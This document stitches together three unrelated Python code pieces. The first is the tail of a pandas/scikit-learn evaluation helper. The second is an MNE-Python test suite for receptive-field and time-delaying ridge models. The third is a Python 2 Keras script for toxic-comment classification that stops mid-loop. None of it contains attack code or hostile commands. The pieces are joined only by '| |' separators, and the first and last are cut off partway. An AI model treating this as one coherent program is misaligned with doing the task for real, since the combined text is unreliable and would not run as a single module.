df2 = pd.read_csv(dataset_paths[i + 1], sep=sep, header=header, na_values=na_values, low_memory=low_memory)
df2 = df2.loc[df2["part_00_electrons"] > 0, :]
merged = pd.merge(merged, df2, how="inner", on=[key])
merged = merged.drop_duplicates(subset=key, keep="first")
return merged[key]
def _optional_output(estimator, evaluation, X, y, write_to_csv, save_confusion_matrix,
learning_curve, confusion_matrix, save_predictions, save_model,
save_feature_importance, fold_num=None):
if write_to_csv:
logging.info("Saving results to file...")
evaluation.write_to_csv(fold_num=fold_num)
if save_confusion_matrix:
logging.info("Saving confusion matrix to file...")
evaluation.save_confusion_matrix()
if learning_curve:
logging.info("Creating learning curve...")
plot_learning_curve(estimator, X, y)
if confusion_matrix:
logging.info("Plotting confusion matrix...")
evaluation.plot_interactive_confusion_matrix()
if save_predictions:
logging.info("Saving predictions to file...")
evaluation.save_predictions()
if save_model:
logging.info("Saving model to file...")
evaluation.save_model()
if save_feature_importance:
logging.info("Saving feature importance to file...")
evaluation.save_feature_importance()
def _print_evaluation_header(pipeline):
logging.info("--------------------------------------------------------------------------------")
logging.info(time.strftime("%a, %d %b %Y %H:%M:%S", time.localtime()))
logging.info("")
logging.info(str(pipeline))
logging.info("--------------------------------------------------------------------------------")
def _get_file_name(dataset, classifier, name, file_type):
classifier_name = type(classifier).__name__
if classifier_name == "Pipeline":
classifier_name = type(classifier.steps[-1][1]).__name__
pipeline_name = classifier.steps[0][0]
else:
pipeline_name = "clf"
if len(dataset) > 4 and dataset[-4] == ".":
dataset = dataset[:-4]
return "{0}_{1}_{2}_{3}_{4}.{5}".format(dataset, classifier_name, pipeline_name, name,
time.strftime("%Y%m%d_%H%M%S", time.localtime()), file_type)
| |
# Authors: Chris Holdgraf <choldgraf@gmail.com>
#
# License: BSD (3-clause)
import os.path as op
import pytest
import numpy as np
from numpy.testing import assert_array_equal, assert_allclose, assert_equal
from mne.fixes import einsum, rfft, irfft
from mne.utils import requires_sklearn, run_tests_if_main
from mne.decoding import ReceptiveField, TimeDelayingRidge
from mne.decoding.receptive_field import (_delay_time_series, _SCORERS,
_times_to_delays, _delays_to_slice)
from mne.decoding.time_delaying_ridge import (_compute_reg_neighbors,
_compute_corrs)
data_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data')
raw_fname = op.join(data_dir, 'test_raw.fif')
event_name = op.join(data_dir, 'test-eve.fif')
tmin, tmax = -0.1, 0.5
event_id = dict(aud_l=1, vis_l=3)
# Loading raw data
n_jobs_test = (1, 'cuda')
def test_compute_reg_neighbors():
    """Test fast calculation of laplacian regularizer."""
    reg_types = (('ridge', 'ridge'),
                 ('ridge', 'laplacian'),
                 ('laplacian', 'ridge'),
                 ('laplacian', 'laplacian'))
    shapes = ((1, 1), (1, 2), (2, 1), (1, 3), (3, 1), (1, 4), (4, 1),
              (2, 2), (2, 3), (3, 2), (3, 3),
              (2, 4), (4, 2), (3, 4), (4, 3), (4, 4),
              (5, 4), (4, 5), (5, 5),
              (20, 9), (9, 20))
    # The 'direct' (hand-rolled) and 'csgraph' (scipy sparse graph) methods
    # must produce the same regularization matrix for every configuration.
    for reg_type in reg_types:
        for n_ch_x, n_delays in shapes:
            for normed in (True, False):
                reg_direct = _compute_reg_neighbors(
                    n_ch_x, n_delays, reg_type, 'direct', normed=normed)
                reg_csgraph = _compute_reg_neighbors(
                    n_ch_x, n_delays, reg_type, 'csgraph', normed=normed)
                assert_allclose(
                    reg_direct, reg_csgraph, atol=1e-7,
                    err_msg='%s: %s' % (reg_type, (n_ch_x, n_delays)))
@requires_sklearn
def test_rank_deficiency():
    """Test signals that are rank deficient."""
    # See GH#4253
    from sklearn.linear_model import Ridge
    N = 256
    fs = 1.
    tmin, tmax = -50, 100
    reg = 0.1
    rng = np.random.RandomState(0)
    eeg = rng.randn(N, 1)
    eeg *= 100
    # Zero out the upper 3/4 of the spectrum to make the signal rank deficient.
    eeg = rfft(eeg, axis=0)
    eeg[N // 4:] = 0  # rank-deficient lowpass
    eeg = irfft(eeg, axis=0)
    # Target: smoothed (convolved) version of the input plus noise.
    win = np.hanning(N // 8)
    win /= win.mean()
    y = np.apply_along_axis(np.convolve, 0, eeg, win, mode='same')
    y += rng.randn(*y.shape) * 100
    # A float estimator means "built-in ridge with this alpha"; both paths
    # must cope with the rank-deficient design.
    for est in (Ridge(reg), reg):
        rf = ReceptiveField(tmin, tmax, fs, estimator=est, patterns=True)
        rf.fit(eeg, y)
        pred = rf.predict(eeg)
        assert_equal(y.shape, pred.shape)
        corr = np.corrcoef(y.ravel(), pred.ravel())[0, 1]
        assert corr > 0.995
def test_time_delay():
    """Test that time-delaying w/ times and samples works properly."""
    # Explicit delays + sfreq
    X = np.random.RandomState(0).randn(1000, 2)
    assert (X == 0).sum() == 0  # need this for later
    # (tmin, tmax) windows paired with the sampling frequency used to
    # convert them into integer sample delays.
    test_tlims = [
        ((1, 2), 1),
        ((1, 1), 1),
        ((0, 2), 1),
        ((0, 1), 1),
        ((0, 0), 1),
        ((-1, 2), 1),
        ((-1, 1), 1),
        ((-1, 0), 1),
        ((-1, -1), 1),
        ((-2, 2), 1),
        ((-2, 1), 1),
        ((-2, 0), 1),
        ((-2, -1), 1),
        ((-2, -1), 1),
        ((0, .2), 10),
        ((-.1, .1), 10)]
    for (tmin, tmax), isfreq in test_tlims:
        # sfreq must be int/float
        with pytest.raises(TypeError, match='`sfreq` must be an instance of'):
            _delay_time_series(X, tmin, tmax, sfreq=[1])
        # Delays must be int/float
        with pytest.raises(TypeError, match='.*complex.*'):
            _delay_time_series(X, np.complex128(tmin), tmax, 1)
        # Make sure swapaxes works
        start, stop = int(round(tmin * isfreq)), int(round(tmax * isfreq)) + 1
        n_delays = stop - start
        X_delayed = _delay_time_series(X, tmin, tmax, isfreq)
        assert_equal(X_delayed.shape, (1000, 2, n_delays))
        # Make sure delay slice is correct
        delays = _times_to_delays(tmin, tmax, isfreq)
        assert_array_equal(delays, np.arange(start, stop))
        keep = _delays_to_slice(delays)
        # Rows that contain no zero-padding anywhere are exactly the "valid"
        # samples the slice should retain (relies on X having no zeros).
        expected = np.where((X_delayed != 0).all(-1).all(-1))[0]
        got = np.arange(len(X_delayed))[keep]
        assert_array_equal(got, expected)
        assert X_delayed[keep].shape[-1] > 0
        assert (X_delayed[keep] == 0).sum() == 0
        # Check each delay column: a delay of ii shifts X by ii samples and
        # zero-pads the opposite end.
        del_zero = int(round(-tmin * isfreq))
        for ii in range(-2, 3):
            idx = del_zero + ii
            err_msg = '[%s,%s] (%s): %s %s' % (tmin, tmax, isfreq, ii, idx)
            if 0 <= idx < X_delayed.shape[-1]:
                if ii == 0:
                    assert_array_equal(X_delayed[:, :, idx], X,
                                       err_msg=err_msg)
                elif ii < 0:  # negative delay
                    assert_array_equal(X_delayed[:ii, :, idx], X[-ii:, :],
                                       err_msg=err_msg)
                    assert_array_equal(X_delayed[ii:, :, idx], 0.)
                else:
                    assert_array_equal(X_delayed[ii:, :, idx], X[:-ii, :],
                                       err_msg=err_msg)
                    assert_array_equal(X_delayed[:ii, :, idx], 0.)
@pytest.mark.parametrize('n_jobs', n_jobs_test)
@requires_sklearn
def test_receptive_field_basic(n_jobs):
    """Test model prep and fitting."""
    from sklearn.linear_model import Ridge
    # Make sure estimator pulling works
    mod = Ridge()
    rng = np.random.RandomState(1337)
    # Test the receptive field model
    # Define parameters for the model and simulate inputs + weights
    tmin, tmax = -10., 0
    n_feats = 3
    rng = np.random.RandomState(0)
    X = rng.randn(10000, n_feats)
    w = rng.randn(int((tmax - tmin) + 1) * n_feats)
    # Delay inputs and cut off first 4 values since they'll be cut in the fit
    X_del = np.concatenate(
        _delay_time_series(X, tmin, tmax, 1.).transpose(2, 0, 1), axis=1)
    # Ground-truth target: linear combination of the delayed inputs.
    y = np.dot(X_del, w)
    # Fit the model and test values
    feature_names = ['feature_%i' % ii for ii in [0, 1, 2]]
    rf = ReceptiveField(tmin, tmax, 1, feature_names, estimator=mod,
                        patterns=True)
    rf.fit(X, y)
    assert_array_equal(rf.delays_, np.arange(tmin, tmax + 1))
    y_pred = rf.predict(X)
    assert_allclose(y[rf.valid_samples_], y_pred[rf.valid_samples_], atol=1e-2)
    scores = rf.score(X, y)
    assert scores > .99
    # Recovered coefficients must match the simulated weights.
    assert_allclose(rf.coef_.T.ravel(), w, atol=1e-3)
    # Make sure different input shapes work
    rf.fit(X[:, np.newaxis:], y[:, np.newaxis])
    rf.fit(X, y[:, np.newaxis])
    with pytest.raises(ValueError, match='If X has 3 .* y must have 2 or 3'):
        rf.fit(X[..., np.newaxis], y)
    with pytest.raises(ValueError, match='X must be shape'):
        rf.fit(X[:, 0], y)
    with pytest.raises(ValueError, match='X and y do not have the same n_epo'):
        rf.fit(X[:, np.newaxis], np.tile(y[:, np.newaxis, np.newaxis],
                                         [1, 2, 1]))
    with pytest.raises(ValueError, match='X and y do not have the same n_tim'):
        rf.fit(X, y[:-2])
    with pytest.raises(ValueError, match='n_features in X does not match'):
        rf.fit(X[:, :1], y)
    # auto-naming features
    feature_names = ['feature_%s' % ii for ii in [0, 1, 2]]
    rf = ReceptiveField(tmin, tmax, 1, estimator=mod,
                        feature_names=feature_names)
    assert_equal(rf.feature_names, feature_names)
    rf = ReceptiveField(tmin, tmax, 1, estimator=mod)
    rf.fit(X, y)
    assert_equal(rf.feature_names, None)
    # Float becomes ridge
    rf = ReceptiveField(tmin, tmax, 1, ['one', 'two', 'three'], estimator=0)
    str(rf)  # repr works before fit
    rf.fit(X, y)
    assert isinstance(rf.estimator_, TimeDelayingRidge)
    str(rf)  # repr works after fit
    rf = ReceptiveField(tmin, tmax, 1, ['one'], estimator=0)
    rf.fit(X[:, [0]], y)
    str(rf)  # repr with one feature
    # Should only accept estimators or floats
    with pytest.raises(ValueError, match='`estimator` must be a float or'):
        ReceptiveField(tmin, tmax, 1, estimator='foo').fit(X, y)
    with pytest.raises(ValueError, match='`estimator` must be a float or'):
        ReceptiveField(tmin, tmax, 1, estimator=np.array([1, 2, 3])).fit(X, y)
    with pytest.raises(ValueError, match='tmin .* must be at most tmax'):
        ReceptiveField(5, 4, 1).fit(X, y)
    # scorers
    for key, val in _SCORERS.items():
        rf = ReceptiveField(tmin, tmax, 1, ['one'],
                            estimator=0, scoring=key, patterns=True)
        rf.fit(X[:, [0]], y)
        y_pred = rf.predict(X[:, [0]]).T.ravel()[:, np.newaxis]
        assert_allclose(val(y[:, np.newaxis], y_pred,
                            multioutput='raw_values'),
                        rf.score(X[:, [0]], y), rtol=1e-2)
    with pytest.raises(ValueError, match='inputs must be shape'):
        _SCORERS['corrcoef'](y.ravel(), y_pred, multioutput='raw_values')
    # Need correct scorers
    with pytest.raises(ValueError, match='scoring must be one of'):
        ReceptiveField(tmin, tmax, 1., scoring='foo').fit(X, y)
@pytest.mark.parametrize('n_jobs', n_jobs_test)
def test_time_delaying_fast_calc(n_jobs):
    """Test time delaying and fast calculations."""
    X = np.array([[1, 2, 3], [5, 7, 11]]).T
    # all negative
    smin, smax = 1, 2
    X_del = _delay_time_series(X, smin, smax, 1.)
    # (n_times, n_features, n_delays) -> (n_times, n_features * n_delays)
    X_del.shape = (X.shape[0], -1)
    expected = np.array([[0, 1, 2], [0, 0, 1], [0, 5, 7], [0, 0, 5]]).T
    assert_allclose(X_del, expected)
    # _compute_corrs must reproduce the explicit Gram matrix X_del.T @ X_del.
    Xt_X = np.dot(X_del.T, X_del)
    expected = [[5, 2, 19, 10], [2, 1, 7, 5], [19, 7, 74, 35], [10, 5, 35, 25]]
    assert_allclose(Xt_X, expected)
    x_xt = _compute_corrs(X, np.zeros((X.shape[0], 1)), smin, smax + 1)[0]
    assert_allclose(x_xt, expected)
    # all positive
    smin, smax = -2, -1
    X_del = _delay_time_series(X, smin, smax, 1.)
    X_del.shape = (X.shape[0], -1)
    expected = np.array([[3, 0, 0], [2, 3, 0], [11, 0, 0], [7, 11, 0]]).T
    assert_allclose(X_del, expected)
    Xt_X = np.dot(X_del.T, X_del)
    expected = [[9, 6, 33, 21], [6, 13, 22, 47],
                [33, 22, 121, 77], [21, 47, 77, 170]]
    assert_allclose(Xt_X, expected)
    x_xt = _compute_corrs(X, np.zeros((X.shape[0], 1)), smin, smax + 1)[0]
    assert_allclose(x_xt, expected)
    # both sides
    smin, smax = -1, 1
    X_del = _delay_time_series(X, smin, smax, 1.)
    X_del.shape = (X.shape[0], -1)
    expected = np.array([[2, 3, 0], [1, 2, 3], [0, 1, 2],
                         [7, 11, 0], [5, 7, 11], [0, 5, 7]]).T
    assert_allclose(X_del, expected)
    Xt_X = np.dot(X_del.T, X_del)
    expected = [[13, 8, 3, 47, 31, 15],
                [8, 14, 8, 29, 52, 31],
                [3, 8, 5, 11, 29, 19],
                [47, 29, 11, 170, 112, 55],
                [31, 52, 29, 112, 195, 112],
                [15, 31, 19, 55, 112, 74]]
    assert_allclose(Xt_X, expected)
    x_xt = _compute_corrs(X, np.zeros((X.shape[0], 1)), smin, smax + 1)[0]
    assert_allclose(x_xt, expected)
    # slightly harder to get the non-Toeplitz correction correct
    X = np.array([[1, 2, 3, 5]]).T
    smin, smax = 0, 3
    X_del = _delay_time_series(X, smin, smax, 1.)
    X_del.shape = (X.shape[0], -1)
    expected = np.array([[1, 2, 3, 5], [0, 1, 2, 3],
                         [0, 0, 1, 2], [0, 0, 0, 1]]).T
    assert_allclose(X_del, expected)
    Xt_X = np.dot(X_del.T, X_del)
    expected = [[39, 23, 13, 5], [23, 14, 8, 3], [13, 8, 5, 2], [5, 3, 2, 1]]
    assert_allclose(Xt_X, expected)
    x_xt = _compute_corrs(X, np.zeros((X.shape[0], 1)), smin, smax + 1)[0]
    assert_allclose(x_xt, expected)
    # even worse
    X = np.array([[1, 2, 3], [5, 7, 11]]).T
    smin, smax = 0, 2
    X_del = _delay_time_series(X, smin, smax, 1.)
    X_del.shape = (X.shape[0], -1)
    expected = np.array([[1, 2, 3], [0, 1, 2], [0, 0, 1],
                         [5, 7, 11], [0, 5, 7], [0, 0, 5]]).T
    assert_allclose(X_del, expected)
    Xt_X = np.dot(X_del.T, X_del)
    expected = np.array([[14, 8, 3, 52, 31, 15],
                         [8, 5, 2, 29, 19, 10],
                         [3, 2, 1, 11, 7, 5],
                         [52, 29, 11, 195, 112, 55],
                         [31, 19, 7, 112, 74, 35],
                         [15, 10, 5, 55, 35, 25]])
    assert_allclose(Xt_X, expected)
    x_xt = _compute_corrs(X, np.zeros((X.shape[0], 1)), smin, smax + 1)[0]
    assert_allclose(x_xt, expected)
    # And a bunch of random ones for good measure
    rng = np.random.RandomState(0)
    X = rng.randn(25, 3)
    y = np.empty((25, 2))
    vals = (0, -1, 1, -2, 2, -11, 11)
    for smax in vals:
        for smin in vals:
            if smin > smax:
                continue
            # Build targets as convolutions of the inputs with random kernels.
            for ii in range(X.shape[1]):
                kernel = rng.randn(smax - smin + 1)
                kernel -= np.mean(kernel)
                y[:, ii % y.shape[-1]] = np.convolve(X[:, ii], kernel, 'same')
            x_xt, x_yt, n_ch_x, _, _ = _compute_corrs(X, y, smin, smax + 1)
            X_del = _delay_time_series(X, smin, smax, 1., fill_mean=False)
            # Cross-correlation term must match the explicit einsum.
            x_yt_true = einsum('tfd,to->ofd', X_del, y)
            x_yt_true = np.reshape(x_yt_true, (x_yt_true.shape[0], -1)).T
            assert_allclose(x_yt, x_yt_true, atol=1e-7, err_msg=(smin, smax))
            X_del.shape = (X.shape[0], -1)
            x_xt_true = np.dot(X_del.T, X_del).T
            assert_allclose(x_xt, x_xt_true, atol=1e-7, err_msg=(smin, smax))
@pytest.mark.parametrize('n_jobs', n_jobs_test)
@requires_sklearn
def test_receptive_field_1d(n_jobs):
    """Test that the fast solving works like Ridge.

    Builds a pure-delay mapping y[t] = x[t - delay] for several delays and
    checks that every estimator variant recovers a coefficient vector that is
    an indicator at the true delay, with the fitted intercept absorbing any
    constant offset added to x.
    """
    from sklearn.linear_model import Ridge
    rng = np.random.RandomState(0)
    x = rng.randn(500, 1)
    for delay in range(-2, 3):
        # Construct y as x shifted by `delay` samples (zeros at the edges).
        y = np.zeros(500)
        slims = [(-2, 4)]
        if delay == 0:
            y[:] = x[:, 0]
        elif delay < 0:
            y[:delay] = x[-delay:, 0]
            slims += [(-4, -1)]
        else:
            y[delay:] = x[:-delay, 0]
            slims += [(1, 2)]
        for ndim in (1, 2):
            # Exercise both 1D (n_times,) and 2D (n_times, 1) target shapes.
            y.shape = (y.shape[0],) + (1,) * (ndim - 1)
            for slim in slims:
                smin, smax = slim
                lap = TimeDelayingRidge(smin, smax, 1., 0.1, 'laplacian',
                                        fit_intercept=False, n_jobs=n_jobs)
                for estimator in (Ridge(alpha=0.), Ridge(alpha=0.1), 0., 0.1,
                                  lap):
                    for offset in (-100, 0, 100):
                        model = ReceptiveField(smin, smax, 1.,
                                               estimator=estimator,
                                               n_jobs=n_jobs)
                        use_x = x + offset
                        model.fit(use_x, y)
                        if estimator is lap:
                            continue  # these checks are too stringent
                        # Intercept should cancel the constant offset.
                        assert_allclose(model.estimator_.intercept_, -offset,
                                        atol=1e-1)
                        assert_array_equal(model.delays_,
                                           np.arange(smin, smax + 1))
                        # Coefficients: 1 at the true delay, 0 elsewhere.
                        expected = (model.delays_ == delay).astype(float)
                        expected = expected[np.newaxis]  # features
                        if y.ndim == 2:
                            expected = expected[np.newaxis]  # outputs
                        assert_equal(model.coef_.ndim, ndim + 1)
                        assert_allclose(model.coef_, expected, atol=1e-3)
                        # Only edge samples should be marked invalid.
                        start = model.valid_samples_.start or 0
                        stop = len(use_x) - (model.valid_samples_.stop or 0)
                        assert stop - start >= 495
                        assert_allclose(
                            model.predict(use_x)[model.valid_samples_],
                            y[model.valid_samples_], atol=1e-2)
                        score = np.mean(model.score(use_x, y))
                        assert score > 0.9999
@pytest.mark.parametrize('n_jobs', n_jobs_test)
@requires_sklearn
def test_receptive_field_nd(n_jobs):
    """Test multidimensional support.

    Uses 3 input features and 2 outputs, distributing known weights at known
    delays, and checks coefficient recovery, reg_type / fit_intercept input
    validation, and intercept handling with and without a DC offset in x.
    """
    from sklearn.linear_model import Ridge
    # multidimensional
    rng = np.random.RandomState(3)
    x = rng.randn(1000, 3)
    y = np.zeros((1000, 2))
    smin, smax = 0, 5
    # This is a weird assignment, but it's just a way to distribute some
    # unique values at various delays, and "expected" explains how they
    # should appear in the resulting RF
    for ii in range(1, 5):
        y[ii:, ii % 2] += (-1) ** ii * ii * x[:-ii, ii % 3]
    y -= np.mean(y, axis=0)
    x -= np.mean(x, axis=0)
    x_off = x + 1e3
    # expected[output][feature][delay] mirrors the loop above.
    expected = [
        [[0, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 4, 0],
         [0, 0, 2, 0, 0, 0]],
        [[0, 0, 0, -3, 0, 0],
         [0, -1, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0]],
    ]
    tdr_l = TimeDelayingRidge(smin, smax, 1., 0.1, 'laplacian', n_jobs=n_jobs)
    tdr_nc = TimeDelayingRidge(smin, smax, 1., 0.1, n_jobs=n_jobs,
                               edge_correction=False)
    # Looser tolerances for the Laplacian and no-edge-correction variants.
    for estimator, atol in zip((Ridge(alpha=0.), 0., 0.01, tdr_l, tdr_nc),
                               (1e-3, 1e-3, 1e-3, 5e-3, 5e-2)):
        model = ReceptiveField(smin, smax, 1.,
                               estimator=estimator)
        model.fit(x, y)
        assert_array_equal(model.delays_,
                           np.arange(smin, smax + 1))
        assert_allclose(model.coef_, expected, atol=atol)
    # Invalid reg_type values must be rejected at fit time.
    tdr = TimeDelayingRidge(smin, smax, 1., 0.01, reg_type='foo',
                            n_jobs=n_jobs)
    model = ReceptiveField(smin, smax, 1., estimator=tdr)
    with pytest.raises(ValueError, match='reg_type entries must be one of'):
        model.fit(x, y)
    tdr = TimeDelayingRidge(smin, smax, 1., 0.01, reg_type=['laplacian'],
                            n_jobs=n_jobs)
    model = ReceptiveField(smin, smax, 1., estimator=tdr)
    with pytest.raises(ValueError, match='reg_type must have two elements'):
        model.fit(x, y)
    # Mismatched fit_intercept between RF and its estimator is an error.
    model = ReceptiveField(smin, smax, 1, estimator=tdr, fit_intercept=False)
    with pytest.raises(ValueError, match='fit_intercept'):
        model.fit(x, y)
    # Now check the intercept_
    tdr = TimeDelayingRidge(smin, smax, 1., 0., n_jobs=n_jobs)
    tdr_no = TimeDelayingRidge(smin, smax, 1., 0., fit_intercept=False,
                               n_jobs=n_jobs)
    for estimator in (Ridge(alpha=0.), tdr,
                      Ridge(alpha=0., fit_intercept=False), tdr_no):
        # first with no intercept in the data
        model = ReceptiveField(smin, smax, 1., estimator=estimator)
        model.fit(x, y)
        assert_allclose(model.estimator_.intercept_, 0., atol=1e-7,
                        err_msg=repr(estimator))
        assert_allclose(model.coef_, expected, atol=1e-3,
                        err_msg=repr(estimator))
        y_pred = model.predict(x)
        assert_allclose(y_pred[model.valid_samples_],
                        y[model.valid_samples_],
                        atol=1e-2, err_msg=repr(estimator))
        score = np.mean(model.score(x, y))
        assert score > 0.9999
        # now with an intercept in the data
        model.fit(x_off, y)
        if estimator.fit_intercept:
            # The intercept should absorb the offset; coef_ stays accurate.
            val = [-6000, 4000]
            itol = 0.5
            ctol = 5e-4
        else:
            # Without an intercept the fit degrades badly on offset data.
            val = itol = 0.
            ctol = 2.
        assert_allclose(model.estimator_.intercept_, val, atol=itol,
                        err_msg=repr(estimator))
        assert_allclose(model.coef_, expected, atol=ctol, rtol=ctol,
                        err_msg=repr(estimator))
        if estimator.fit_intercept:
            ptol = 1e-2
            stol = 0.999999
        else:
            ptol = 10
            stol = 0.6
        y_pred = model.predict(x_off)[model.valid_samples_]
        assert_allclose(y_pred, y[model.valid_samples_],
                        atol=ptol, err_msg=repr(estimator))
        score = np.mean(model.score(x_off, y))
        assert score > stol, estimator
    # RF-level fit_intercept=False builds a matching estimator internally.
    model = ReceptiveField(smin, smax, 1., fit_intercept=False)
    model.fit(x_off, y)
    assert_allclose(model.estimator_.intercept_, 0., atol=1e-7)
    score = np.mean(model.score(x_off, y))
    assert score > 0.6
def _make_data(n_feats, n_targets, n_samples, tmin, tmax):
    """Create a random design matrix and linearly delayed targets.

    Draws X from a fixed-seed standard normal, draws a random weight matrix
    over all (delay, feature) pairs, and produces y as the delayed-and-
    weighted projection of X.
    """
    rng = np.random.RandomState(0)
    X = rng.randn(n_samples, n_feats)
    n_weights = int((tmax - tmin) + 1) * n_feats
    w = rng.randn(n_weights, n_targets)
    # Stack the delayed copies of X side by side: (n_samples, n_weights).
    delayed = _delay_time_series(X, tmin, tmax, 1.).transpose(2, 0, 1)
    X_del = np.concatenate(delayed, axis=1)
    y = np.dot(X_del, w)
    return X, y
@requires_sklearn
def test_inverse_coef():
    """Test inverse coefficients computation.

    Fits a forward model (X -> y) and an inverse model (y -> X) with
    patterns enabled, checks the shapes of coef_/patterns_, and verifies
    that patterns and coefficients are approximately mutually inverse.
    """
    from sklearn.linear_model import Ridge

    tmin, tmax = 0., 10.
    n_feats, n_targets, n_samples = 3, 2, 1000
    n_delays = int((tmax - tmin) + 1)

    # Check coefficient dims, for all estimator types
    X, y = _make_data(n_feats, n_targets, n_samples, tmin, tmax)
    tdr = TimeDelayingRidge(tmin, tmax, 1., 0.1, 'laplacian')
    for estimator in (0., 0.01, Ridge(alpha=0.), tdr):
        rf = ReceptiveField(tmin, tmax, 1., estimator=estimator,
                            patterns=True)
        rf.fit(X, y)
        inv_rf = ReceptiveField(tmin, tmax, 1., estimator=estimator,
                                patterns=True)
        inv_rf.fit(y, X)

        # BUG FIX: the previous assert_array_equal(a, b, shape) calls passed
        # the expected shape as the third positional argument, which is
        # ``err_msg`` -- the shape tuple was never actually compared.
        # Assert each shape explicitly instead.
        assert rf.coef_.shape == (n_targets, n_feats, n_delays)
        assert rf.patterns_.shape == (n_targets, n_feats, n_delays)
        assert inv_rf.coef_.shape == (n_feats, n_targets, n_delays)
        assert inv_rf.patterns_.shape == (n_feats, n_targets, n_delays)

        # we should have np.dot(patterns.T,coef) ~ np.eye(n)
        c0 = rf.coef_.reshape(n_targets, n_feats * n_delays)
        c1 = rf.patterns_.reshape(n_targets, n_feats * n_delays)
        assert_allclose(np.dot(c0, c1.T), np.eye(c0.shape[0]), atol=0.2)
@requires_sklearn
def test_linalg_warning():
    """Test that warnings are issued when no regularization is applied.

    Fitting an over-determined, unregularized model should trigger a
    singular-matrix warning from the solver.  ``tmin``/``tmax`` come from
    module scope.
    """
    from sklearn.linear_model import Ridge
    n_feats, n_targets, n_samples = 5, 60, 50
    X, y = _make_data(n_feats, n_targets, n_samples, tmin, tmax)
    for estimator in (0., Ridge(alpha=0.)):
        rf = ReceptiveField(tmin, tmax, 1., estimator=estimator)
        # BUG FIX: the old pattern '[Singular|scipy.linalg.solve]' is a regex
        # *character class* (it matches any single one of those characters),
        # not an alternation, so it matched almost any warning message.
        # Use a grouped alternation so the match is meaningful.
        with pytest.warns((RuntimeWarning, UserWarning),
                          match='(Singular|scipy.linalg.solve)'):
            rf.fit(y, X)
# Run this module's tests when it is executed directly as a script
# (MNE test-helper convention).
run_tests_if_main()
| |
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import os
import re
import csv
import math
import codecs
import keras
from keras import optimizers
from keras import backend as K
from keras import regularizers
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout, Flatten
from keras.layers import Embedding, Conv1D, MaxPooling1D, GlobalMaxPooling1D
from keras.utils import np_utils
from keras.utils import plot_model
from keras.models import load_model
from keras.preprocessing import sequence
from keras.preprocessing.text import Tokenizer
from keras.callbacks import ModelCheckpoint
from keras.callbacks import TensorBoard
from keras.callbacks import LearningRateScheduler
from keras.callbacks import EarlyStopping
from tqdm import tqdm
from nltk.corpus import stopwords
from nltk.tokenize import RegexpTokenizer
# Global plotting style for the histograms/curves saved below.
sns.set_style("whitegrid")
# Output/input locations for model artifacts and Kaggle CSVs.
SAVE_PATH = '/data/vision/fisher/data1/kaggle/toxic/'
DATA_PATH = '/data/vision/fisher/data1/kaggle/toxic/data/'
# Cap on the vocabulary size kept by the Keras Tokenizer.
MAX_NB_WORDS = 100000
#EMBEDDING_DIR = '/data/vision/fisher/data1/Glove/'
EMBEDDING_DIR = '/data/vision/fisher/data1/FastText/'
# Fix the NumPy seed for reproducibility.
np.random.seed(0)
# NOTE(review): this NLTK word tokenizer is later rebound to a Keras
# Tokenizer (see the "tokenizing input data" section below).
tokenizer = RegexpTokenizer(r'\w+')
# English stopwords plus bare punctuation tokens to drop during cleaning.
stop_words = set(stopwords.words('english'))
stop_words.update(['.', ',', '"', "'", ':', ';', '(', ')', '[', ']', '{', '}'])
def step_decay(epoch):
    """Step-wise learning-rate schedule: halve the rate every 4 epochs.

    Starts at 0.001 and multiplies by 0.5 once per completed group of
    ``epochs_drop`` epochs (epoch is 0-based, hence the ``1 + epoch``).
    """
    base_lr = 0.001
    drop_factor = 0.5
    epochs_drop = 4.0
    exponent = math.floor((1 + epoch) / epochs_drop)
    return base_lr * math.pow(drop_factor, exponent)
class LR_hist(keras.callbacks.Callback):
    """Keras callback recording the loss and scheduled LR after each epoch."""

    def on_train_begin(self, logs={}):
        # Reset the recorded history at the start of every training run.
        self.losses = []
        self.lr = []

    def on_epoch_end(self, batch, logs={}):
        current_loss = logs.get('loss')
        self.losses.append(current_loss)
        # Recompute the LR from the schedule; the number of recorded losses
        # doubles as the epoch counter.
        self.lr.append(step_decay(len(self.losses)))
#load embeddings
print 'loading word embeddings...'
#disabled alternative below: GloVe embeddings (kept as a bare string
#literal, so it is never executed)
"""
embeddings_index = {}
f = codecs.open(os.path.join(EMBEDDING_DIR, 'glove.6B.300d.txt'), encoding='utf-8')
for line in tqdm(f):
    values = line.split(' ')
    word = values[0]
    coefs = np.asarray(values[1:], dtype='float32')
    embeddings_index[word] = coefs
f.close()
print('found %s word vectors' % len(embeddings_index))
"""
#parse FastText vectors: each line is "<word> <float> <float> ..."
embeddings_index = {}
f = codecs.open(os.path.join(EMBEDDING_DIR, 'wiki.en.vec'), encoding='utf-8')
for line in tqdm(f):
    values = line.rstrip().rsplit(' ')
    word = values[0]
    coefs = np.asarray(values[1:], dtype='float32')
    embeddings_index[word] = coefs
f.close()
print('found %s word vectors' % len(embeddings_index))
#load data
train_df = pd.read_csv(DATA_PATH + '/train.csv', sep=',', header=0)
test_df = pd.read_csv(DATA_PATH + '/test.csv', sep=',', header=0)
#NOTE(review): only test_df is fillna'd -- confirm train.csv has no
#missing comment_text values
test_df = test_df.fillna('_NA_')
print "num train: ", train_df.shape[0]
print "num test: ", test_df.shape[0]
#label columns = everything except the id and the raw text
label_names = filter(lambda x: x not in ['id', 'comment_text'], train_df.columns.tolist())
y_train = train_df[label_names].values
#visualize word distribution
train_df['doc_len'] = train_df['comment_text'].apply(lambda words: len(words.split(" ")))
#sequence length cutoff = mean + 1 std of the document-length distribution
max_seq_len = np.round(train_df['doc_len'].mean() + train_df['doc_len'].std()).astype(int)
sns.distplot(train_df['doc_len'], hist=True, kde=True, color='b', label='doc len')
plt.axvline(x=max_seq_len, color='k', linestyle='--', label='max len')
plt.title('comment length'); plt.legend()
plt.savefig('./figures/comment_length_hist.png')
raw_docs_train = train_df['comment_text'].tolist()
raw_docs_test = test_df['comment_text'].tolist()
num_classes = len(label_names)
print "pre-processing train data..."
#tokenize with the NLTK RegexpTokenizer and drop stopwords/punctuation,
#then re-join so the Keras Tokenizer can consume plain strings
processed_docs_train = []
for doc in tqdm(raw_docs_train):
    tokens = tokenizer.tokenize(doc)
    filtered = [word for word in tokens if word not in stop_words]
    processed_docs_train.append(" ".join(filtered))
#end for
processed_docs_test = []
for doc in tqdm(raw_docs_test):
